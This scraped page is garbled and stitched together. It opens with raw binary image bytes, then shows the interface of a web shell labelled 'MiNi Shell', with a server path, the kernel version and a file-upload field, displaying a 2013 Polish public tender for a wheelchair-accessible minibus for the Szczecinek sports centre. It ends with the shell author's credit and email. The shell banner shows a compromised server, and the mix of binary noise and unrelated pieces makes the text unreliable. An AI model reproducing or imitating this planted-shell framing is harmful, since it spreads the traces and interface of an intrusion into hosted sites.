JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131014/213589-N-2013.html

<p class="kh_header"><b>Szczecinek: DOSTAWA MIKROBUSU   DLA  OŚRODKA  SPORTU I REKREACJI  W  SZCZECINKU</b><br>
<b>Numer ogłoszenia: 213589 - 2013; data zamieszczenia: 14.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji w Szczecinku , ul.  Piłsudskiego 3, 78-400 Szczecinek, woj. zachodniopomorskie, tel. 094 3721091, faks 094 3743402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osir.szczecinek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> osir@osir.szczecinek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MIKROBUSU   DLA  OŚRODKA  SPORTU I REKREACJI  W  SZCZECINKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego rok produkcji 2013, nieużywanego, dziewięcioosobowego samochodu osobowego mikrobusu) przystosowanego do przewozu osób niepełnosprawnych, w tym na jednym wózku inwalidzkim,  o następujących parametrach:
wymiary: długość nie mniej niż 5 m, wysokość nie mniej niż 1,9 m, szerokość nie mniej niż 
1,9 m, rozstaw osi co najmniej 3,4 m. 
ilość miejsc: 9 osób  łącznie z kierowcą
przystosowany do przewozu jednego wózka  inwalidzkiego z pasażerem,
silnik wysokoprężny z turbodoładowaniem minimum 110 KM, co najmniej 1800 m2, wersja EURO 5, 
skrzynia biegów manualna co najmniej 5 - cio biegowa + bieg wsteczny, 
układ hamulcowy hydrauliczny z systemami ABS,  EBV i AFU,  
elektroniczny układ stabilizacji jazdy ESP,
instalacja elektryczna 12V lub 24 V, akumulator minimum 95 Ah, wyłącznik główny instalacji elektrycznej, 
deska rozdzielcza z szybkościomierzem w kilometrach, obrotomierzem elektronicznym, zestawem wskaźników metrycznych oraz kontrolkami informującymi o stanie środków eksploatacyjnych pojazdu,	
wspomaganie układu kierowniczego oraz regulowanie  kolumny kierowniczej w co najmniej dwóch płaszczyznach, 
poduszka powietrzna dla kierowcy oraz  pasażerów siedzących obok kierowcy, 
komputer pokładowy,
klimatyzacja z nawiewem na tył kabiny, drugi wymiennik ciepła z niezależną regulacją i nawiewami na tył kabiny, 
pełne przeszklenie przedziału pasażerskiego, szyby pojedyncze, wklejane, przednia szyba ze szkła klejonego, szyby w drzwiach przednich otwierane elektrycznie,
drzwi przesuwne z prawej strony, tylne drzwi dwuskrzydłowe przeszklone do połowy,
fotel kierowcy  komfortowy, resorowany z zagłówkiem regulowanym co do   wysokości, tapicerka z izolacją termiczną w kolorze pozostałych foteli autobusu,  trzypunktowy pas bezpieczeństwa, podłokietnik, 
podwójne siedzenie obok kierowcy tapicerowane w kolorze foteli przedziału pasażerskiego, trzypunktowe pasy bezpieczeństwa, podłokietniki, 
ściany i sufit wnętrza pojazdu łącznie z wnękami okiennymi) wyłożone miękka tapicerką, o jasnym kolorze pastelowym,
podłoga pojazdu pokryta wodoodporną wykładziną antypoślizgową, 
6 foteli pasażerów zamontowanych w dwóch rzędach ze zintegrowanymi zagłówkami i regulacją oparcia oraz podłokietnikami,  biodrowe pasy bezpieczeństwa, tapicerka z izolacją termiczną o pastelowych kolorach - identyczna z pozostałymi fotelami, dopasowana kolorystycznie do tapicerki miękkiej ścian i sufitu,
fotele  pasażerów montowane na szynach z możliwością ich przesuwania i szybkiego demontażu,
mocowanie  wózka inwalidzkiego do szyny podłogowej, pasy biodrowe dla pasażera wózka inwalidzkiego, najazd do załadunku wózka inwalidzkiego z antypoślizgową bieżnią, 
zamontowane radio-odtwarzacz CD,  minimum 4 głośniki,
autoalarm i centralny zamek, immobiliser, 
ogumienie letnie bez wskazania producenta, obręcze stalowe, jedno koło zapasowe, 
lusterka zewnętrzne sterowane i ogrzewane elektrycznie, 
stały hak holowniczy, kulkowy,  gniazdo wtykowe przyczepy, 
reflektory z  elektrycznie regulowanym zasięgiem,  dodatkowe światła awaryjne w tylnej części dachu, 
tabliczki znamionowe i dokumentacja pojazdu w języku polskim, 
podnośnik hydrauliczny, niezbędny zestaw narzędzi, apteczka, dodatkowa gaśnica 2 kg
kolor nadwozia metalizowany z oznaczeniami pojazd dla inwalidów.
Udzielenie gwarancji jakości na przedmiot zamówienia na okres:
minimum 2 lata na pojazd bez ograniczenia przebiegu kilometrów,
minimum 3 lata na lakier i korozję powierzchni bez ograniczenia przebiegu,
minimum 10 lat na korozję perforacyjną bez ograniczenia przebiegu.
Wykonawca dostarczy dokument gwarancji udzielonej przez producenta.
Zamawiający wymaga, aby:
pojazd był fabrycznie nowy, nieużywany, wyprodukowany w 2013 roku,
wykonawca, w chwili odbioru przez zamawiającego przedmiotu zamówienia, przekazał zamawiającemu dokumenty związane z dopuszczeniem pojazdu do eksploatacji (karta pojazdu, świadectwo homologacji pojazdu do przewozu osób niepełnosprawnych,  rozszerzone badanie techniczne, instrukcja obsługi i książka gwarancyjna  w języku polskim,  faktura zakupu,
w chwili dostawy pojazdu posiadał wykonany przegląd zerowy oraz gwarancję określoną w książce gwarancyjnej,
Wykonawca w chwili odbioru przedmiotu zamówienia umożliwił zamawiającemu przeprowadzenie jazdy próbnej na odcinku do 5 km..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.11.44.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunki udziału w postępowaniu, jeżeli:
posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia;
spełnia wymagania określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych,
nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych, 
Zamawiający będzie dokonywał oceny spełniania tych warunków oraz sprawdzenia kompletności i poprawności na podstawie dostarczonych oświadczeń lub dokumentów dostarczonych zgodnie z sekcją VI SIWZ. Warunki będą oceniane wg formuły spełnia/ nie spełnia. Zamawiający wymaga spełnienia wszystkich tych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia wymagania określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>krajowe świadectwo homologacji autobusu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osir.szczecinek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji w Szczecinku, ul. Józefa Piłsudskiego 3, telefon 
0943721091.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2013 godzina 11:00, miejsce: Ośrodek Sportu i Rekreacji w Szczecinku, ul. Józefa Piłsudskiego 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com